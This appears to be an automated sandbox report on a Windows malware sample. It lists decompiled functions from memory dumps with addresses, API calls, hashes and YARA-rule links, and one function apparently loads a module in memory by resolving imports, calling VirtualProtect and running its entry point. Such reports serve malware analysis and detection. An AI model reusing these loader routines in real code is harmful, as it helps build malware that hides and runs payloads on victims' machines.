                                                            			E00DD76D4(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0xdda290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                                            0x00dd76d9
                                                            0x00dd76de
                                                            0x00dd76ec
                                                            0x00dd76f2
                                                            0x00dd76f6
                                                            0x00dd7767
                                                            0x00dd76f8
                                                            0x00dd76fc
                                                            0x00dd76ff
                                                            0x00dd7702
                                                            0x00dd7709
                                                            0x00dd770a
                                                            0x00dd770b
                                                            0x00dd770f
                                                            0x00dd7712
                                                            0x00dd7719
                                                            0x00dd771f
                                                            0x00dd7720
                                                            0x00dd7720
                                                            0x00dd7727
                                                            0x00dd7728
                                                            0x00dd7729
                                                            0x00dd772d
                                                            0x00dd7739
                                                            0x00dd773f
                                                            0x00dd7740
                                                            0x00dd7740
                                                            0x00dd7742
                                                            0x00dd7748
                                                            0x00dd774a
                                                            0x00dd774f
                                                            0x00dd7750
                                                            0x00dd7750
                                                            0x00dd7756
                                                            0x00dd775f
                                                            0x00dd7761
                                                            0x00dd7764
                                                            0x00dd7773

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00DD76EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ac44ffba4c0c357b6e341d4f3fc940cfad9e49df1d42451552a54c0285987c54
                                                            • Instruction ID: 2138f6aca71e998933389367a85d56428c3ab20dbaf8d46fc1bca12de4ef0c7e
                                                            • Opcode Fuzzy Hash: ac44ffba4c0c357b6e341d4f3fc940cfad9e49df1d42451552a54c0285987c54
                                                            • Instruction Fuzzy Hash: BC11B73524A344AFEB158F2DD851BE97B65EB53358F2850CBE4808B392C177890BC770
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456A046, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(0457C493,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0456A081
                                                              • Part of subcall function 04570FA5: NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,0458C300), ref: 04570FBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleInformationModuleProcessQuery
                                                            • String ID:
                                                            • API String ID: 2776635927-0
                                                            • Opcode ID: f53bfef794450eda3d4b910a47a741cd0b9a277dcefa07ea5f3a5b2ef97e0538
                                                            • Instruction ID: 64f1bad4b2b0b758b781e3a4069af268fb869da320dcb02caf03a396fe3af94f
                                                            • Opcode Fuzzy Hash: f53bfef794450eda3d4b910a47a741cd0b9a277dcefa07ea5f3a5b2ef97e0538
                                                            • Instruction Fuzzy Hash: 3A219371200205AFEB20CF55D580A6A77E5FF463B47148429E946AB251DA31FD00FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045717BC, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0457180E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 19655df56c1050723f074fe9409249ae25f4117802e9a23e0cce39b35f10f172
                                                            • Instruction ID: d70bb071cabfae758f07fbab7f5f47deb8c61ea97f93fb22eedf11e7a7acf6f3
                                                            • Opcode Fuzzy Hash: 19655df56c1050723f074fe9409249ae25f4117802e9a23e0cce39b35f10f172
                                                            • Instruction Fuzzy Hash: 7C11083660011AAFDF119F99EC409DA7BA9FF48374B058139FD19A6260CB35EC21EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD5D1D, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 34%
                                                            			E00DD5D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xdda2d4; // 0x2bed5a8
				_t4 = _t15 + 0xddb394; // 0x39c893c
				_t20 = _t4;
				_t6 = _t15 + 0xddb124; // 0x650047
				_t17 = E00DD18B7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00DD1440(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                            0x00dd5d27
                                                            0x00dd5d29
                                                            0x00dd5d30
                                                            0x00dd5d31
                                                            0x00dd5d32
                                                            0x00dd5d33
                                                            0x00dd5d39
                                                            0x00dd5d3e
                                                            0x00dd5d3e
                                                            0x00dd5d48
                                                            0x00dd5d5a
                                                            0x00dd5d61
                                                            0x00dd5d90
                                                            0x00dd5d63
                                                            0x00dd5d68
                                                            0x00dd5d8d
                                                            0x00dd5d6a
                                                            0x00dd5d6d
                                                            0x00dd5d74
                                                            0x00dd5d7f
                                                            0x00dd5d76
                                                            0x00dd5d79
                                                            0x00dd5d79
                                                            0x00dd5d83
                                                            0x00dd5d83
                                                            0x00dd5d68
                                                            0x00dd5d97

                                                            APIs
                                                              • Part of subcall function 00DD18B7: SysFreeString.OLEAUT32(?), ref: 00DD1996
                                                              • Part of subcall function 00DD1440: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DD3B57,004F0053,00000000,?), ref: 00DD1449
                                                              • Part of subcall function 00DD1440: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DD3B57,004F0053,00000000,?), ref: 00DD1473
                                                              • Part of subcall function 00DD1440: memset.NTDLL ref: 00DD1487
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD5D83
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeString$lstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 397948122-0
                                                            • Opcode ID: b20db0bf75b57f49e2ef86d837319fdf8433c585b5a9d6ad0645961f5bb2e41b
                                                            • Instruction ID: 183681e0176510e78fcf98db9a628ee6cc57a6de36010824bce20db739403faa
                                                            • Opcode Fuzzy Hash: b20db0bf75b57f49e2ef86d837319fdf8433c585b5a9d6ad0645961f5bb2e41b
                                                            • Instruction Fuzzy Hash: 6201B131500529BFDF10AFA8EC09EAEBBB9FB05710F004867E941E2264E3719911DBF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD6507, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 89%
                                                            			E00DD6507(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E00DD76D4(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0xdda2d4; // 0x2bed5a8
						_t9 = _t17 + 0xddb9e8; // 0x444f4340
						_t20 = E00DD4730( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0xdda290, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                                            0x00dd650a
                                                            0x00dd6510
                                                            0x00dd6567
                                                            0x00dd6516
                                                            0x00dd6521
                                                            0x00dd6526
                                                            0x00dd652a
                                                            0x00dd6537
                                                            0x00dd653f
                                                            0x00dd654b
                                                            0x00dd6553
                                                            0x00dd655d
                                                            0x00dd655d
                                                            0x00dd652a
                                                            0x00dd656c

                                                            APIs
                                                              • Part of subcall function 00DD76D4: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00DD76EC
                                                              • Part of subcall function 00DD4730: lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00DD4764
                                                              • Part of subcall function 00DD4730: StrStrA.SHLWAPI(00000000,?), ref: 00DD4771
                                                              • Part of subcall function 00DD4730: RtlAllocateHeap.NTDLL(00000000,?), ref: 00DD4790
                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00DD598B), ref: 00DD655D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Heap$Allocate$Freelstrlen
                                                            • String ID:
                                                            • API String ID: 2220322926-0
                                                            • Opcode ID: 450e0c8c349443dce6e132c63110729b4b4677ed68852c9bc13a82e82f4bc68a
                                                            • Instruction ID: c313b9ad06e07b209fc597f6dacd92a21763a81f5cb1d15b99de9d93c3e70920
                                                            • Opcode Fuzzy Hash: 450e0c8c349443dce6e132c63110729b4b4677ed68852c9bc13a82e82f4bc68a
                                                            • Instruction Fuzzy Hash: EB018176100208FFCB21CF88DC41EAA7BA9EB54350F144066FA45C6264E731EE44DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456ACFC, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0456C5E7: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0458C140,00000000,0456AD03,?,0456D280,?), ref: 0456C606
                                                              • Part of subcall function 0456C5E7: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0458C140,00000000,0456AD03,?,0456D280,?), ref: 0456C611
                                                              • Part of subcall function 0456C5E7: _wcsupr.NTDLL ref: 0456C61E
                                                              • Part of subcall function 0456C5E7: lstrlenW.KERNEL32(00000000), ref: 0456C626
                                                            • ResumeThread.KERNEL32(00000004,?,0456D280,?), ref: 0456AD11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                                            • String ID:
                                                            • API String ID: 3646851950-0
                                                            • Opcode ID: 1f951e6d05b70eb19365d52b0dc9a41702e0cb64e62fdd73153fb40166f63361
                                                            • Instruction ID: f148bc522cb6c7e650a089f4de93d809bd8a146fcdabda44b3a70df8741dbd11
                                                            • Opcode Fuzzy Hash: 1f951e6d05b70eb19365d52b0dc9a41702e0cb64e62fdd73153fb40166f63361
                                                            • Instruction Fuzzy Hash: C6D09E74244316B6E7322A119D05B1A7EA2BF56A99F10882CFAC7A20A1D7B5EC10F515
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0458465D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0458466A
                                                              • Part of subcall function 0458477A: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002858C,04560000), ref: 045847F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                            • String ID:
                                                            • API String ID: 123106877-0
                                                            • Opcode ID: 6c8be1817cf164c54f5b3aed7e2a4312e79afdcb892432c008adab761d8b05f1
                                                            • Instruction ID: 3d87464b25eb262dfe55b69b60f3556271f02a963cfccd7bfa07fcabcc37e5f2
                                                            • Opcode Fuzzy Hash: 6c8be1817cf164c54f5b3aed7e2a4312e79afdcb892432c008adab761d8b05f1
                                                            • Instruction Fuzzy Hash: 49A001D63A9207BD331876626DA6D3B165CF4C2A263B0895EF905F4050BE803C46B835
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04584678, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0458466A
                                                              • Part of subcall function 0458477A: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002858C,04560000), ref: 045847F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                            • String ID:
                                                            • API String ID: 123106877-0
                                                            • Opcode ID: a912032931d9fb98046a1a0d8e9af1446db88e4e01d95a20accde1371252fa48
                                                            • Instruction ID: 16b8e7f77c5d0aacaa19d0bae955f6362a402ba15df5293fe93258712c5b6239
                                                            • Opcode Fuzzy Hash: a912032931d9fb98046a1a0d8e9af1446db88e4e01d95a20accde1371252fa48
                                                            • Instruction Fuzzy Hash: 4EA001D63A9207FD331876626DA6D3B165CF4C6A663B0895EE906E4050BE803C46B831
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04583C4A, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 4772afd52fc24a7cf1edb459fe503ff38f1a5fdfdc1d4e3c353dbcbf1da7e05c
                                                            • Instruction ID: 81a7c969c69c761f7034bf996da8ca713eed7cf5ced2e5dd2f769873e17adfd3
                                                            • Opcode Fuzzy Hash: 4772afd52fc24a7cf1edb459fe503ff38f1a5fdfdc1d4e3c353dbcbf1da7e05c
                                                            • Instruction Fuzzy Hash: 64B01231000100EBCB114B00DD04F097B21F750700F015418F204640A18E399C68FF08
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD77D7, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD77D7(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xdda290, 0, _a4); // executed
				return _t2;
			}




                                                            0x00dd77e3
                                                            0x00dd77e9

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: c58293b9f701e63140596f7cc3610e3f6c5e1a80a40fe52e4dae5c972928623c
                                                            • Instruction ID: 5408ac18feec17026f80fce4a30f52d4ca4a1293ace810b0ef09b59765d69d44
                                                            • Opcode Fuzzy Hash: c58293b9f701e63140596f7cc3610e3f6c5e1a80a40fe52e4dae5c972928623c
                                                            • Instruction Fuzzy Hash: A8B01235056300ABCA124B00ED04F05BF32B750B00F10C012B2048017082330420EB29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD77EC, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD77EC(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xdda290, 0, _a4); // executed
				return _t2;
			}




                                                            0x00dd77f8
                                                            0x00dd77fe

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 84bd9b46c0d00f65f3c2dbd512eba5b91260897957e5d3b53918dab85516815b
                                                            • Instruction ID: 70089964a87d83c0c01651275cde10d7c31aa793074d880cf4368fa9844ae03e
                                                            • Opcode Fuzzy Hash: 84bd9b46c0d00f65f3c2dbd512eba5b91260897957e5d3b53918dab85516815b
                                                            • Instruction Fuzzy Hash: EDB01275145300ABCB124B01EE04F05BF22B750B00F008012B308D017882330420FB3A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD3612, Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD3612(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E00DD17FA(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E00DD77D7(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E00DD77EC(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E00DD2525(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E00DD3FAB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                                                            0x00dd361d
                                                            0x00dd3620
                                                            0x00dd3629
                                                            0x00dd362c
                                                            0x00dd362f
                                                            0x00dd3632
                                                            0x00dd372e
                                                            0x00dd3732
                                                            0x00dd3644
                                                            0x00dd3650
                                                            0x00dd3657
                                                            0x00dd365e
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd3664
                                                            0x00dd366c
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd3672
                                                            0x00dd367b
                                                            0x00dd367f
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd3681
                                                            0x00dd3688
                                                            0x00dd368d
                                                            0x00dd368f
                                                            0x00dd3692
                                                            0x00dd3713
                                                            0x00dd371a
                                                            0x00dd371c
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd371e
                                                            0x00dd3722
                                                            0x00dd3727
                                                            0x00dd3727
                                                            0x00000000
                                                            0x00dd3722
                                                            0x00dd3699
                                                            0x00dd36a1
                                                            0x00dd36a1
                                                            0x00dd36aa
                                                            0x00dd36b8
                                                            0x00dd370f
                                                            0x00dd370f
                                                            0x00000000
                                                            0x00dd36db
                                                            0x00dd36de
                                                            0x00000000
                                                            0x00dd36de
                                                            0x00dd36b8
                                                            0x00dd36ed
                                                            0x00dd36fb
                                                            0x00dd3700
                                                            0x00dd3702
                                                            0x00dd3717
                                                            0x00000000
                                                            0x00dd3717
                                                            0x00dd3704
                                                            0x00dd370a
                                                            0x00dd370d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd370d

                                                            APIs
                                                            • memcpy.NTDLL(00000000,?,?,?,?,00DD6E08,?,00DD6E08,?,00DD6E08), ref: 00DD3699
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: de29d870a994540890709b5c818db95062e9abfadc975bae42559ab9d213e7ed
                                                            • Instruction ID: 0416ff4bd75e62613c3f84a15f5fb30b70022764ff2bd431276572ab37135770
                                                            • Opcode Fuzzy Hash: de29d870a994540890709b5c818db95062e9abfadc975bae42559ab9d213e7ed
                                                            • Instruction Fuzzy Hash: A7311BB6A00519BFDF21EEA4C880FAEB7B9EB14344F2440AAE505A7341D6309F45CB72
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1B55, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E6E4B1B55(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e4b41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e4b41cc - 0x69b24f45 &  !( *0x6e4b41cc - 0x69b24f45);
				_t18 = E6E4B165D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e4b41cc - 0x69b24f45 &  !( *0x6e4b41cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e4b41cc - 0x69b24f45 &  !( *0x6e4b41cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E4B119E(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E4B1552(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E4B1D96(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E4B2117(_t42);
					L8:
					return _t29;
				}
			}














                                                            0x6e4b1b5d
                                                            0x6e4b1b5f
                                                            0x6e4b1b7b
                                                            0x6e4b1b8c
                                                            0x6e4b1b93
                                                            0x6e4b1bf1
                                                            0x00000000
                                                            0x6e4b1b95
                                                            0x6e4b1b95
                                                            0x6e4b1b9f
                                                            0x6e4b1ba3
                                                            0x6e4b1ba8
                                                            0x6e4b1bab
                                                            0x6e4b1bb0
                                                            0x6e4b1bb4
                                                            0x6e4b1bb9
                                                            0x6e4b1bbe
                                                            0x6e4b1bc2
                                                            0x6e4b1bc7
                                                            0x6e4b1bc8
                                                            0x6e4b1bcc
                                                            0x6e4b1bd1
                                                            0x6e4b1bd9
                                                            0x6e4b1bd9
                                                            0x6e4b1bd1
                                                            0x6e4b1bc2
                                                            0x6e4b1bb4
                                                            0x6e4b1bdb
                                                            0x6e4b1be4
                                                            0x6e4b1be8
                                                            0x6e4b1bf2
                                                            0x6e4b1bf8
                                                            0x6e4b1bf8

                                                            APIs
                                                              • Part of subcall function 6E4B165D: GetModuleHandleA.KERNEL32(?,00000020), ref: 6E4B1681
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16A3
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16B9
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16CF
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16E5
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16FB
                                                              • Part of subcall function 6E4B119E: memcpy.NTDLL(?,?,?), ref: 6E4B11CB
                                                              • Part of subcall function 6E4B119E: memcpy.NTDLL(?,?,?), ref: 6E4B11FE
                                                              • Part of subcall function 6E4B1552: LoadLibraryA.KERNELBASE ref: 6E4B158A
                                                              • Part of subcall function 6E4B1D96: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E4B1DCF
                                                              • Part of subcall function 6E4B1D96: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E4B1E44
